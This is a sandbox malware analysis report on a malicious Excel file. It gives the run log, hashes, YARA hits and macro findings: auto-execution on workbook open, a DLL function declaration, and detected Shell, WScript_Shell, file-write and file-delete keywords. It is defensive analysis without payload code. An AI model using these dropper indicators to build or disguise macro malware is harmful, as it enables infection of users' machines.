Analysis

Category Package Started Completed Duration
FILE xls 2019-10-10 00:08:42 2019-10-10 00:12:35 233 seconds
2019-10-10 01:08:43,000 [root] INFO: Date set to: 10-10-19, time set to: 00:08:43, timeout set to: 200
2019-10-10 01:08:43,062 [root] DEBUG: Starting analyzer from: C:\ukhgvkq
2019-10-10 01:08:43,062 [root] DEBUG: Storing results at: C:\lYOAdYxE
2019-10-10 01:08:43,062 [root] DEBUG: Pipe server name: \\.\PIPE\yFbkhMmdTU
2019-10-10 01:08:43,062 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-10-10 01:08:43,062 [root] INFO: Automatically selected analysis package "xls"
2019-10-10 01:08:44,653 [root] DEBUG: Started auxiliary module Browser
2019-10-10 01:08:44,668 [root] DEBUG: Started auxiliary module Curtain
2019-10-10 01:08:44,668 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2019-10-10 01:08:46,229 [modules.auxiliary.digisig] DEBUG: File format not recognized.
2019-10-10 01:08:46,243 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2019-10-10 01:08:46,243 [root] DEBUG: Started auxiliary module DigiSig
2019-10-10 01:08:46,243 [root] DEBUG: Started auxiliary module Disguise
2019-10-10 01:08:46,243 [root] DEBUG: Started auxiliary module Human
2019-10-10 01:08:46,243 [root] DEBUG: Started auxiliary module Screenshots
2019-10-10 01:08:46,259 [root] DEBUG: Started auxiliary module Sysmon
2019-10-10 01:08:46,259 [root] DEBUG: Started auxiliary module Usage
2019-10-10 01:08:46,259 [root] INFO: Analyzer: Package modules.packages.xls does not specify a DLL option
2019-10-10 01:08:46,259 [root] INFO: Analyzer: Package modules.packages.xls does not specify a DLL_64 option
2019-10-10 01:08:46,727 [lib.api.process] INFO: Successfully executed process from path "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" with arguments ""C:\Users\user\AppData\Local\Temp\tmp7ch5i7dz.xls" /e" with pid 2024
2019-10-10 01:08:46,727 [lib.api.process] INFO: 32-bit DLL to inject is C:\ukhgvkq\dll\KtlSDdmU.dll, loader C:\ukhgvkq\bin\ZvIcTcA.exe
2019-10-10 01:08:46,775 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\yFbkhMmdTU.
2019-10-10 01:08:46,789 [root] DEBUG: Loader: Injecting process 2024 (thread 1520) with C:\ukhgvkq\dll\KtlSDdmU.dll.
2019-10-10 01:08:46,789 [root] DEBUG: Process image base: 0x2FA20000
2019-10-10 01:08:46,789 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ukhgvkq\dll\KtlSDdmU.dll.
2019-10-10 01:08:46,789 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x30DF1000 - 0x77680000
2019-10-10 01:08:46,789 [root] DEBUG: InjectDllViaIAT: Allocated 0x204 bytes for new import table at 0x30E00000.
2019-10-10 01:08:46,789 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:08:46,789 [root] DEBUG: Successfully injected DLL C:\ukhgvkq\dll\KtlSDdmU.dll.
2019-10-10 01:08:46,789 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2024
2019-10-10 01:08:48,802 [lib.api.process] INFO: Successfully resumed process with pid 2024
2019-10-10 01:08:48,802 [root] INFO: Added new process to list with pid: 2024
2019-10-10 01:08:48,973 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:08:49,020 [root] INFO: Disabling sleep skipping.
2019-10-10 01:08:49,020 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:08:49,020 [root] INFO: Disabling sleep skipping.
2019-10-10 01:08:49,020 [root] INFO: Disabling sleep skipping.
2019-10-10 01:08:49,020 [root] INFO: Disabling sleep skipping.
2019-10-10 01:08:49,020 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2024 at 0x74b50000, image base 0x2fa20000, stack from 0x406000-0x410000
2019-10-10 01:08:49,020 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" "C:\Users\user\AppData\Local\Temp\tmp7ch5i7dz.xls" \e.
2019-10-10 01:08:49,020 [root] INFO: Monitor successfully loaded in process with pid 2024.
2019-10-10 01:08:49,068 [root] DEBUG: DLL unloaded from 0x74DC0000.
2019-10-10 01:08:49,145 [root] DEBUG: DLL loaded at 0x719D0000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\mso (0x11e4000 bytes).
2019-10-10 01:08:49,193 [root] DEBUG: DLL loaded at 0x74740000: C:\Windows\system32\msi (0x240000 bytes).
2019-10-10 01:08:49,255 [root] DEBUG: DLL loaded at 0x74DC0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-10-10 01:09:15,993 [root] DEBUG: DLL loaded at 0x745A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\Comctl32 (0x19e000 bytes).
2019-10-10 01:09:16,086 [root] DEBUG: DLL loaded at 0x74190000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf (0x40f000 bytes).
2019-10-10 01:09:16,742 [root] DEBUG: DLL loaded at 0x75B30000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-10-10 01:09:16,757 [root] DEBUG: DLL loaded at 0x74180000: C:\Windows\system32\msimtf (0xb000 bytes).
2019-10-10 01:09:16,757 [root] DEBUG: DLL loaded at 0x74170000: C:\Windows\system32\VERSION (0x9000 bytes).
2019-10-10 01:09:16,835 [root] DEBUG: DLL loaded at 0x71880000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\riched20 (0x14f000 bytes).
2019-10-10 01:09:16,867 [root] DEBUG: DLL loaded at 0x6D350000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\MSORES (0x452a000 bytes).
2019-10-10 01:09:16,882 [root] DEBUG: DLL loaded at 0x6D0E0000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\1033\MSOINTL (0x262000 bytes).
2019-10-10 01:09:16,930 [root] DEBUG: DLL loaded at 0x6CF50000: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus (0x190000 bytes).
2019-10-10 01:09:16,976 [root] DEBUG: DLL unloaded from 0x77230000.
2019-10-10 01:09:17,023 [root] INFO: Announced 32-bit process name:  pid: 132709257
2019-10-10 01:09:17,023 [lib.api.process] WARNING: The process with pid 132709257 is not alive, injection aborted
2019-10-10 01:09:17,023 [root] DEBUG: DLL loaded at 0x74120000: C:\Windows\system32\mscoree (0x4a000 bytes).
2019-10-10 01:09:17,023 [root] DEBUG: set_caller_info: Adding region at 0x00310000 to caller regions list (advapi32::RegQueryInfoKeyW).
2019-10-10 01:09:17,023 [root] DEBUG: set_caller_info: Adding region at 0x00410000 to caller regions list (kernel32::FindFirstFileExW).
2019-10-10 01:09:17,039 [root] DEBUG: DLL loaded at 0x740A0000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei (0x7b000 bytes).
2019-10-10 01:09:17,148 [root] DEBUG: DLL loaded at 0x74080000: C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPC (0x20000 bytes).
2019-10-10 01:09:17,303 [root] DEBUG: DLL loaded at 0x6CED0000: C:\Windows\system32\UxTheme (0x80000 bytes).
2019-10-10 01:09:17,460 [root] DEBUG: DLL loaded at 0x74060000: C:\Windows\system32\DwmApi (0x13000 bytes).
2019-10-10 01:09:17,490 [root] DEBUG: DLL unloaded from 0x75D20000.
2019-10-10 01:09:17,490 [root] DEBUG: DLL loaded at 0x74030000: C:\Windows\system32\POWRPROF (0x25000 bytes).
2019-10-10 01:09:17,506 [root] DEBUG: DLL loaded at 0x75420000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-10-10 01:09:17,522 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-10-10 01:09:17,522 [root] DEBUG: DLL loaded at 0x756A0000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-10-10 01:09:17,522 [root] DEBUG: DLL unloaded from 0x74030000.
2019-10-10 01:09:17,974 [root] DEBUG: DLL loaded at 0x751D0000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-10-10 01:09:17,974 [root] DEBUG: DLL loaded at 0x75190000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-10-10 01:09:17,990 [root] DEBUG: DLL loaded at 0x74050000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-10-10 01:09:18,270 [root] DEBUG: DLL loaded at 0x76430000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2019-10-10 01:09:18,286 [root] DEBUG: DLL unloaded from 0x2FA20000.
2019-10-10 01:09:18,318 [root] DEBUG: DLL loaded at 0x6CDD0000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-10-10 01:09:18,318 [root] DEBUG: DLL loaded at 0x75420000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-10-10 01:09:18,318 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-10-10 01:09:18,334 [root] DEBUG: DLL loaded at 0x756A0000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-10-10 01:09:18,334 [root] DEBUG: DLL unloaded from 0x76430000.
2019-10-10 01:09:18,334 [root] DEBUG: DLL loaded at 0x74C10000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-10-10 01:09:18,334 [root] DEBUG: DLL loaded at 0x76240000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-10-10 01:09:18,427 [root] DEBUG: DLL loaded at 0x74040000: C:\Windows\system32\profapi (0xb000 bytes).
2019-10-10 01:09:18,443 [root] DEBUG: DLL loaded at 0x760D0000: C:\Windows\SysWOW64\urlmon (0x136000 bytes).
2019-10-10 01:09:18,457 [root] DEBUG: DLL loaded at 0x77130000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-10-10 01:09:18,473 [root] DEBUG: DLL loaded at 0x756C0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-10-10 01:09:18,473 [root] DEBUG: DLL loaded at 0x75D80000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-10-10 01:09:18,473 [root] DEBUG: DLL loaded at 0x758C0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-10-10 01:09:18,630 [root] DEBUG: DLL loaded at 0x6CDB0000: C:\Windows\system32\MPR (0x12000 bytes).
2019-10-10 01:09:18,864 [root] DEBUG: DLL unloaded from 0x77230000.
2019-10-10 01:09:19,003 [root] DEBUG: DLL loaded at 0x6CA70000: C:\Program Files (x86)\Microsoft Office\Office14\GKExcel (0x338000 bytes).
2019-10-10 01:09:19,660 [root] DEBUG: DLL unloaded from 0x6CA70000.
2019-10-10 01:09:19,971 [root] DEBUG: DLL loaded at 0x6CC50000: C:\Windows\System32\msxml6 (0x158000 bytes).
2019-10-10 01:09:20,267 [root] DEBUG: DLL loaded at 0x6CBF0000: C:\Windows\system32\SXS (0x5f000 bytes).
2019-10-10 01:09:20,315 [root] DEBUG: DLL loaded at 0x6C960000: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\VBE7 (0x28d000 bytes).
2019-10-10 01:09:20,345 [root] DEBUG: set_caller_info: Adding region at 0x01F70000 to caller regions list (ntdll::memcpy).
2019-10-10 01:09:20,377 [root] DEBUG: DLL loaded at 0x65300000: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\1033\VBE7INTL (0x26000 bytes).
2019-10-10 01:09:20,377 [root] DEBUG: set_caller_info: Adding region at 0x06610000 to caller regions list (ntdll::memcpy).
2019-10-10 01:09:20,440 [root] DEBUG: set_caller_info: Adding region at 0x05D30000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-10-10 01:09:20,440 [root] DEBUG: set_caller_info: Adding region at 0x00010000 to caller regions list (advapi32::RegOpenKeyExW).
2019-10-10 01:09:20,470 [root] DEBUG: set_caller_info: Adding region at 0x04E30000 to caller regions list (ntdll::memcpy).
2019-10-10 01:09:20,486 [root] DEBUG: set_caller_info: Adding region at 0x00620000 to caller regions list (ntdll::memcpy).
2019-10-10 01:09:20,517 [root] DEBUG: set_caller_info: Adding region at 0x007B0000 to caller regions list (advapi32::RegOpenKeyExA).
2019-10-10 01:09:20,517 [root] DEBUG: set_caller_info: Adding region at 0x00130000 to caller regions list (advapi32::RegOpenKeyExW).
2019-10-10 01:09:20,532 [root] DEBUG: set_caller_info: Adding region at 0x04E50000 to caller regions list (kernel32::GetLocalTime).
2019-10-10 01:09:20,532 [root] DEBUG: set_caller_info: Adding region at 0x064D0000 to caller regions list (kernel32::GetLocalTime).
2019-10-10 01:09:20,532 [root] DEBUG: set_caller_info: Adding region at 0x05150000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-10-10 01:09:20,549 [root] DEBUG: DLL loaded at 0x6C830000: C:\Windows\SysWOW64\FM20 (0x12c000 bytes).
2019-10-10 01:09:20,549 [root] DEBUG: DLL loaded at 0x770B0000: C:\Windows\syswow64\COMDLG32 (0x7b000 bytes).
2019-10-10 01:09:20,549 [root] DEBUG: DLL loaded at 0x74C40000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32 (0x84000 bytes).
2019-10-10 01:09:20,579 [root] DEBUG: set_caller_info: Adding region at 0x00200000 to caller regions list (ntdll::memcpy).
2019-10-10 01:12:10,605 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-10-10 01:12:10,605 [root] INFO: Created shutdown mutex.
2019-10-10 01:12:11,618 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 2024
2019-10-10 01:12:11,618 [root] INFO: Terminate event set for process 2024.
2019-10-10 01:12:11,618 [root] INFO: Terminating process 2024 before shutdown.
2019-10-10 01:12:11,618 [root] INFO: Waiting for process 2024 to exit.
2019-10-10 01:12:12,632 [root] INFO: Waiting for process 2024 to exit.
2019-10-10 01:12:13,661 [root] INFO: Waiting for process 2024 to exit.
2019-10-10 01:12:14,676 [root] INFO: Waiting for process 2024 to exit.
2019-10-10 01:12:15,690 [lib.api.process] INFO: Successfully terminated process with pid 2024.
2019-10-10 01:12:15,690 [root] INFO: Waiting for process 2024 to exit.
2019-10-10 01:12:16,703 [root] INFO: Shutting down package.
2019-10-10 01:12:16,703 [root] INFO: Stopping auxiliary modules.
2019-10-10 01:12:16,703 [root] INFO: Finishing auxiliary modules.
2019-10-10 01:12:16,703 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-10-10 01:12:16,703 [root] WARNING: File at path "C:\lYOAdYxE\debugger" does not exist, skip.
2019-10-10 01:12:16,703 [root] WARNING: Monitor injection attempted but failed for process 132709257.
2019-10-10 01:12:16,703 [root] INFO: Analysis completed.

MalScore

9.0

Malicious

Machine

Name Label Manager Started On Shutdown On
target-03 target-03 ESX 2019-10-10 00:08:42 2019-10-10 00:12:33

File Details

File Name tmp7ch5i7dz
File Size 738304 bytes
File Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 1, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Aug 30 09:14:50 2019, Last Saved Time/Date: Wed Oct 9 11:36:59 2019, Security: 0
MD5 0e8199b87cea34af9d5a919c3152c989
SHA1 2b2db989545c2c2559d425d43fc5e4f0f606df17
SHA256 f9704b16c55b131c8b80be4cdc46a5b9ee4ec3b07c9060da846c6f46f5669459
SHA512 886559bf14f8d752775b504550944099b0b03a8be8f250cac37730463754c2268c4e53e26e2270b6aa0edee476028d9ef0728e77a8004ea9e11e40b81fa767c6
CRC32 35E50A56
Ssdeep 12288:RcngSigpoTkKN/zLYBYPGcHdPlOga9uLNZx57gZJoTcfEhwtFN04R:R/tTkKN7LYBYOcJkga9eTHqE+t8s
TrID
  • 50.0% (.XLS) Microsoft Excel sheet (32500/1/3)
  • 37.6% (.XLS) Microsoft Excel sheet (alternate) (24500/1/2)
  • 12.3% (.) Generic OLE2 / Multistream Compound File (8000/1)
ClamAV None matched
Yara
  • embedded_pe - Contains an embedded PE32 file
  • embedded_win_api - A non-Windows executable contains win32 API functions names
  • shellcode_patterns - Matched shellcode byte patterns
CAPE Yara

Signatures

Dynamic (imported) function loading detected
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: GKExcel.dll/FValidateExcelFile
DynamicLoader: GKExcel.dll/HrInitHost
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/TryEnterCriticalSection
DynamicLoader: kernel32.dll/SetCriticalSectionSpinCount
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: SHELL32.DLL/SHIsFileAvailableOffline
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: Comctl32.dll/RegisterClassNameW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/GetTickCount64
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: VERSION.dll/GetFileVersionInfoA
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeA
DynamicLoader: VERSION.dll/VerQueryValueA
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: SXS.DLL/SxsOleAut32MapReferenceClsidToConfiguredClsid
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: VBE7.DLL/DllVbeInit
DynamicLoader: mso.dll/_MsoInitGimme@12
DynamicLoader: mso.dll/_MsoFGimmeFeatureEx@8
DynamicLoader: mso.dll/_MsoFGimmeComponentEx@24
DynamicLoader: mso.dll/_MsoFGimmeComponentEx@20
DynamicLoader: mso.dll/_MsoFGimmeFileEx@24
DynamicLoader: mso.dll/_MsoFGimmeFileEx@20
DynamicLoader: mso.dll/_MsoSetLVProperty@8
DynamicLoader: mso.dll/_MsoVBADigSigCallDlg@20
DynamicLoader: mso.dll/_MsoVbaInitSecurity@4
DynamicLoader: mso.dll/_MsoFIEPolicyAndVersion@8
DynamicLoader: mso.dll/_MsoFUseIEFeature@8
DynamicLoader: mso.dll/_MsoFAnsiCodePageSupportsLCID@8
DynamicLoader: mso.dll/_MsoFInitOffice@20
DynamicLoader: mso.dll/_MsoUninitOffice@4
DynamicLoader: mso.dll/_MsoFGetFontSettings@20
DynamicLoader: mso.dll/_MsoRgchToRgwch@16
DynamicLoader: mso.dll/_MsoHrSimpleQueryInterface@16
DynamicLoader: mso.dll/_MsoHrSimpleQueryInterface2@20
DynamicLoader: mso.dll/_MsoFCreateControl@36
DynamicLoader: mso.dll/_MsoFLongLoad@8
DynamicLoader: mso.dll/_MsoFLongSave@8
DynamicLoader: mso.dll/_MsoFGetTooltips@0
DynamicLoader: mso.dll/_MsoFSetTooltips@4
DynamicLoader: mso.dll/_MsoFLoadToolbarSet@24
DynamicLoader: mso.dll/_MsoFCreateToolbarSet@28
DynamicLoader: mso.dll/_MsoInitShrGlobal@4
DynamicLoader: mso.dll/_MsoHpalOffice@0
DynamicLoader: mso.dll/_MsoFWndProcNeeded@4
DynamicLoader: mso.dll/_MsoFWndProc@24
DynamicLoader: mso.dll/_MsoFCreateITFCHwnd@20
DynamicLoader: mso.dll/_MsoDestroyITFC@4
DynamicLoader: mso.dll/_MsoFPitbsFromHwndAndMsg@12
DynamicLoader: mso.dll/_MsoFGetComponentManager@4
DynamicLoader: mso.dll/_MsoMultiByteToWideChar@24
DynamicLoader: mso.dll/_MsoWideCharToMultiByte@32
DynamicLoader: mso.dll/_MsoHrRegisterAll@0
DynamicLoader: mso.dll/_MsoFSetComponentManager@4
DynamicLoader: mso.dll/_MsoFCreateStdComponentManager@20
DynamicLoader: mso.dll/_MsoFHandledMessageNeeded@4
DynamicLoader: mso.dll/_MsoPeekMessage@8
DynamicLoader: mso.dll/_MsoGetWWWCmdInfo@20
DynamicLoader: mso.dll/_MsoFExecWWWHelp@8
DynamicLoader: mso.dll/_MsoFCreateIPref@28
DynamicLoader: mso.dll/_MsoDestroyIPref@4
DynamicLoader: mso.dll/_MsoChsFromLid@4
DynamicLoader: mso.dll/_MsoCpgFromChs@4
DynamicLoader: mso.dll/_MsoSetLocale@4
DynamicLoader: mso.dll/_MsoFSetHMsoinstOfSdm@4
DynamicLoader: mso.dll/_MsoVBADigSig2CallDlgEx@28
DynamicLoader: mso.dll/_MsoVbaInitSecurityEx@4
DynamicLoader: OLEAUT32.dll/SysFreeString
DynamicLoader: OLEAUT32.dll/LoadTypeLib
DynamicLoader: OLEAUT32.dll/RegisterTypeLib
DynamicLoader: OLEAUT32.dll/QueryPathOfRegTypeLib
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/OleTranslateColor
DynamicLoader: OLEAUT32.dll/OleCreateFontIndirect
DynamicLoader: OLEAUT32.dll/OleCreatePictureIndirect
DynamicLoader: OLEAUT32.dll/OleLoadPicture
DynamicLoader: OLEAUT32.dll/OleCreatePropertyFrameIndirect
DynamicLoader: OLEAUT32.dll/OleCreatePropertyFrame
DynamicLoader: OLEAUT32.dll/OleIconToCursor
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/OleLoadPictureEx
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/MonitorFromWindow
DynamicLoader: USER32.dll/MonitorFromRect
DynamicLoader: USER32.dll/MonitorFromPoint
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/EnumDisplayDevicesA
DynamicLoader: OLEAUT32.dll/DispCallFunc
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/CreateTypeLib2
DynamicLoader: OLEAUT32.dll/VarDateFromUdate
DynamicLoader: OLEAUT32.dll/VarUdateFromDate
DynamicLoader: OLEAUT32.dll/GetAltMonthNames
DynamicLoader: OLEAUT32.dll/VarNumFromParseNum
DynamicLoader: OLEAUT32.dll/VarParseNumFromStr
DynamicLoader: OLEAUT32.dll/VarDecFromR4
DynamicLoader: OLEAUT32.dll/VarDecFromR8
DynamicLoader: OLEAUT32.dll/VarDecFromDate
DynamicLoader: OLEAUT32.dll/VarDecFromI4
DynamicLoader: OLEAUT32.dll/VarDecFromCy
DynamicLoader: OLEAUT32.dll/VarR4FromDec
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromTypeInfo
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromGuids
DynamicLoader: OLEAUT32.dll/SafeArrayGetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArraySetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArrayGetIID
DynamicLoader: OLEAUT32.dll/SafeArraySetIID
DynamicLoader: OLEAUT32.dll/SafeArrayCopyData
DynamicLoader: OLEAUT32.dll/SafeArrayAllocDescriptorEx
DynamicLoader: OLEAUT32.dll/SafeArrayCreateEx
DynamicLoader: OLEAUT32.dll/VarFormat
DynamicLoader: OLEAUT32.dll/VarFormatDateTime
DynamicLoader: OLEAUT32.dll/VarFormatNumber
DynamicLoader: OLEAUT32.dll/VarFormatPercent
DynamicLoader: OLEAUT32.dll/VarFormatCurrency
DynamicLoader: OLEAUT32.dll/VarWeekdayName
DynamicLoader: OLEAUT32.dll/VarMonthName
DynamicLoader: OLEAUT32.dll/VarAdd
DynamicLoader: OLEAUT32.dll/VarAnd
DynamicLoader: OLEAUT32.dll/VarCat
DynamicLoader: OLEAUT32.dll/VarDiv
DynamicLoader: OLEAUT32.dll/VarEqv
DynamicLoader: OLEAUT32.dll/VarIdiv
DynamicLoader: OLEAUT32.dll/VarImp
DynamicLoader: OLEAUT32.dll/VarMod
DynamicLoader: OLEAUT32.dll/VarMul
DynamicLoader: OLEAUT32.dll/VarOr
DynamicLoader: OLEAUT32.dll/VarPow
DynamicLoader: OLEAUT32.dll/VarSub
DynamicLoader: OLEAUT32.dll/VarXor
DynamicLoader: OLEAUT32.dll/VarAbs
DynamicLoader: OLEAUT32.dll/VarFix
DynamicLoader: OLEAUT32.dll/VarInt
DynamicLoader: OLEAUT32.dll/VarNeg
DynamicLoader: OLEAUT32.dll/VarNot
DynamicLoader: OLEAUT32.dll/VarRound
DynamicLoader: OLEAUT32.dll/VarCmp
DynamicLoader: OLEAUT32.dll/VarDecAdd
DynamicLoader: OLEAUT32.dll/VarDecCmp
DynamicLoader: OLEAUT32.dll/VarBstrCat
DynamicLoader: OLEAUT32.dll/VarCyMulI4
DynamicLoader: OLEAUT32.dll/VarBstrCmp
DynamicLoader: ole32.dll/CoCreateInstanceEx
DynamicLoader: ole32.dll/CLSIDFromProgIDEx
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/_MsoMultiByteToWideChar@24
DynamicLoader: SXS.DLL/SxsOleAut32RedirectTypeLibrary
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid
DynamicLoader: mso.dll/_MsoFTranslateCp@16
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/NlsGetCacheUpdateCount
DynamicLoader: USER32.dll/NotifyWinEvent
The office file has an unconventional code page: ANSI Cyrillic; Cyrillic (Windows)
The office file contains 5 macros
The office file contains a macro with auto execution
Workbook_Activate: Runs when the Excel Workbook is opened
The office file contains anomalous features
creation_anomaly: The file appears to have an edit time yet has no creation time or last saved time. This can be a sign of an automated document creation kit.
numerical_author: The file author is numerical rather than a word or name, which is indicative of an automated document creation kit.
numerical_last_saved: The file was last saved by a numerical author rather than a word or name, which is indicative of an automated document creation kit.
The office file contains a macro with potential indicators of compromise
Executable file name: Public Declare PtrSafe Function Wakeup Lib libGTPK2.dll () As Integer
Executable file name: Public Declare Function Wakeup Lib libGTPK1.dll () As Integer
Executable file name: nm = nm.dll
The office file contains a macro with suspicious strings
Chr: May attempt to obfuscate specific strings (use option --deobf to deobfuscate)
Open: May open a file
Shell: May run an executable file or a system command
WScript_Shell: May run an executable file or a system command
Binary: May read or write a binary file (if combined with Open)
CreateObject: May create an OLE object
Write: May write to a file (if combined with Open)
Put: May write to a file (if combined with Open)
Lib: May run code from a DLL
Kill: May delete a file
FileCopy: May copy a file
ActiveWorkbook_SaveAs: May save the current workbook

Screenshots


Hosts

No hosts contacted.

DNS

No domains contacted.


Summary

SummaryInformation Metadata

Creating Application Microsoft Excel
Author 1
Last Saved By 1
Creation Time None
Last Saved Time None
Total Edit Time None
Document Title None
Document Subject None
Amount of Pages None
Amount of Words None
Amount of Characters None

DocumentSummaryInformation Metadata

Company
Document Version None
Digital Signature None
Language None
Notes None

File Analysis (Signatures)

IOCs
Executable file name Public Declare PtrSafe Function Wakeup Lib libGTPK2.dll () As Integer
